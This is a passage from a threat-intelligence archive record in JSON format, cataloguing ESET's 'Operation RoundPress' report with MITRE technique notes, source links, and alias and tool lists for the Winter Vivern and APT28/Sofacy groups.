C\u0026C server.\r\nExfiltration | T1041 | Exfiltration Over C2 Channel | SpyPress payloads exfiltrate data over the C\u0026C channel.\r\nSource: https://www.welivesecurity.com/en/eset-research/operation-roundpress/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://www.welivesecurity.com/en/eset-research/operation-roundpress/"
	],
	"report_names": [
		"operation-roundpress"
	],
	"threat_actors": [
		{
			"id": "23226bab-4c84-4c65-a8d1-7ac10c44b172",
			"created_at": "2023-04-27T02:04:45.463683Z",
			"updated_at": "2026-04-10T02:00:04.980143Z",
			"deleted_at": null,
			"main_name": "Winter Vivern",
			"aliases": [
				"TA473",
				"TAG-70",
				"UAC-0114",
				"UNC4907"
			],
			"source_name": "ETDA:Winter Vivern",
			"tools": [
				"APERETIF"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e6704f3c-15d7-4e1d-b5a8-e33e7e9bd925",
			"created_at": "2023-11-04T02:00:07.660461Z",
			"updated_at": "2026-04-10T02:00:03.385093Z",
			"deleted_at": null,
			"main_name": "Winter Vivern",
			"aliases": [
				"TA-473",
				"UAC-0114",
				"TA473",
				"TAG-70"
			],
			"source_name": "MISPGALAXY:Winter Vivern",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a20598c1-894c-4173-be6e-64a1ce9732bd",
			"created_at": "2024-11-01T02:00:52.652891Z",
			"updated_at": "2026-04-10T02:00:05.375678Z",
			"deleted_at": null,
			"main_name": "Winter Vivern",
			"aliases": [
				"Winter Vivern",
				"TA473",
				"UAC-0114"
			],
			"source_name": "MITRE:Winter Vivern",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28",
				"ATK5",
				"Blue Athena",
				"BlueDelta",
				"FROZENLAKE",
				"Fancy Bear",
				"Fighting Ursa",
				"Forest Blizzard",
				"GRAPHITE",
				"Group 74",
				"PawnStorm",
				"STRONTIUM",
				"Sednit",
				"Snakemackerel",
				"Sofacy",
				"TA422",
				"TG-4127",
				"Tsar Team",
				"UAC-0001"
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab",
			"created_at": "2022-10-25T16:07:24.212584Z",
			"updated_at": "2026-04-10T02:00:04.900038Z",
			"deleted_at": null,
			"main_name": "Sofacy",
			"aliases": [
				"APT 28",
				"ATK 5",
				"Blue Athena",
				"BlueDelta",
				"FROZENLAKE",
				"Fancy Bear",
				"Fighting Ursa",
				"Forest Blizzard",
				"G0007",
				"Grey-Cloud",
				"Grizzly Steppe",
				"Group 74",
				"GruesomeLarch",
				"ITG05",
				"Iron Twilight",
				"Operation DealersChoice",
				"Operation Dear Joohn",
				"Operation Komplex",
				"Operation Pawn Storm",
				"Operation RoundPress",
				"Operation Russian Doll",
				"Operation Steal-It",
				"Pawn Storm",
				"SIG40",
				"Sednit",
				"Snakemackerel",
				"Sofacy",
				"Strontium",
				"T-APT-12",
				"TA422",
				"TAG-0700",
				"TAG-110",
				"TG-4127",
				"Tsar Team",
				"UAC-0028",
				"UAC-0063"
			],
			"source_name": "ETDA:Sofacy",
			"tools": [
				"ADVSTORESHELL",
				"AZZY",
				"Backdoor.SofacyX",
				"CHERRYSPY",
				"CORESHELL",
				"Carberp",
				"Computrace",
				"DealersChoice",
				"Delphacy",
				"Downdelph",
				"Downrage",
				"Drovorub",
				"EVILTOSS",
				"Foozer",
				"GAMEFISH",
				"GooseEgg",
				"Graphite",
				"HATVIBE",
				"HIDEDRV",
				"Headlace",
				"Impacket",
				"JHUHUGIT",
				"JKEYSKW",
				"Koadic",
				"Komplex",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LoJack",
				"LoJax",
				"MASEPIE",
				"Mimikatz",
				"NETUI",
				"Nimcy",
				"OCEANMAP",
				"OLDBAIT",
				"PocoDown",
				"PocoDownloader",
				"Popr-d30",
				"ProcDump",
				"PythocyDbg",
				"SMBExec",
				"SOURFACE",
				"SPLM",
				"STEELHOOK",
				"Sasfis",
				"Sedkit",
				"Sednit",
				"Sedreco",
				"Seduploader",
				"Shunnael",
				"SkinnyBoy",
				"Sofacy",
				"SofacyCarberp",
				"SpiderLabs Responder",
				"Trojan.Shunnael",
				"Trojan.Sofacy",
				"USB Stealer",
				"USBStealer",
				"VPNFilter",
				"Win32/USBStealer",
				"WinIDS",
				"Winexe",
				"X-Agent",
				"X-Tunnel",
				"XAPS",
				"XTunnel",
				"Xagent",
				"Zebrocy",
				"Zekapab",
				"carberplike",
				"certutil",
				"certutil.exe",
				"fysbis",
				"webhp"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434233,
	"ts_updated_at": 1775792269,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e2c747a4021a1d5fcf088e14331c633969283fd9.pdf",
		"text": "https://archive.orkl.eu/e2c747a4021a1d5fcf088e14331c633969283fd9.txt",
		"img": "https://archive.orkl.eu/e2c747a4021a1d5fcf088e14331c633969283fd9.jpg"
	}
}